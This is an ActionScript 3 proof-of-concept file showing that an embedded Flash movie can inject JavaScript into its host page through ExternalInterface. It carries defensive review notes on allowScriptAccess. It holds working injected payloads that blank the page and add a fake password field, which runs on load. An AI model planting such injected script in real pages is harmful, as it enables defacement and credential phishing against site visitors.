/*
	Security Issue: Javascript Injection
	Roy McElmurry
	8/4/2010

	Demonstrates that a SWF embedded in a web page can run JavaScript in that
	page through ExternalInterface. Whether the call is permitted is decided by
	the embedding page, not by the SWF: the allowScriptAccess parameter on the
	object/embed tag controls it. With "always" any SWF may script the page;
	with "sameDomain" only a SWF served from the page's own domain may; with
	"never" the call is refused.

	Review points for a page that embeds third-party SWF content:
	  - set allowScriptAccess="never" unless the SWF genuinely needs the bridge;
	  - serve untrusted SWFs from a separate domain so "sameDomain" does not
	    apply to them;
	  - treat any SWF that is allowed to script the page as having the same
	    privileges as the page's own JavaScript (DOM, form fields, cookies
	    readable from script).
*/
package {
	import flash.display.Sprite;
	import flash.system.Security;
	import flash.external.ExternalInterface;

	[SWF(backgroundColor="#ffffff", frameRate="24", width="550", height="400")]

	/**
	 * Proof-of-concept movie: on construction it hands a JavaScript function
	 * literal to the hosting page through ExternalInterface.
	 *
	 * The three constants are escalating examples of what script injected this
	 * way can do to the host document. Only MALICIOUS is used by the
	 * constructor; ANNOYING and MEAN are kept for comparison.
	 */
	public class SecurityIssue extends Sprite {

		/** Harmless example: shows a single alert dialog. */
		private const ANNOYING:String =
			'function() {' +
			' alert("hahaha");' +
			'}';

		/** Destructive example: empties the page's body element, then shows an alert. */
		private const MEAN:String =
			'function() {' +
			' document.getElementsByTagName("body")[0].innerHTML = "";' +
			' alert("pwned");' +
			'}';

		/**
		 * Data-exposure example: appends a labelled password field to the page
		 * whose onblur handler displays whatever was typed. It shows that
		 * injected script can add its own form controls to the host page and
		 * read their values.
		 */
		private const MALICIOUS:String =
			'function() {' +
			' var label = document.createElement("label");' +
			' var pass = document.createElement("input");' +
			' pass.setAttribute("type", "password");' +
			' pass.setAttribute("onblur", "alert(\\\"Got your password fool: \\\" + this.value)");' +
			' label.appendChild(pass);' +
			' label.innerHTML = "Password: " + label.innerHTML;' +
			' document.getElementsByTagName("body")[0].appendChild(label);' +
			'}';

		/**
		 * Runs the demonstration as soon as the movie is instantiated.
		 */
		public function SecurityIssue():void {
			// Lets content served from "localhost" script this SWF.
			// NOTE(review): this looks like the inbound direction only; the
			// outbound call below is governed by the page's allowScriptAccess
			// setting. Confirm against the test page.
			Security.allowDomain("localhost");

			// available is true only when the container exposes the bridge.
			if (ExternalInterface.available) {
				// The first argument is passed to the page as the thing to
				// invoke. Here it is a whole function literal rather than the
				// name of an existing function, so the page ends up running
				// script that the SWF supplied.
				var injectedSource:String = MALICIOUS;
				ExternalInterface.call(injectedSource);
			}
		}
	}
}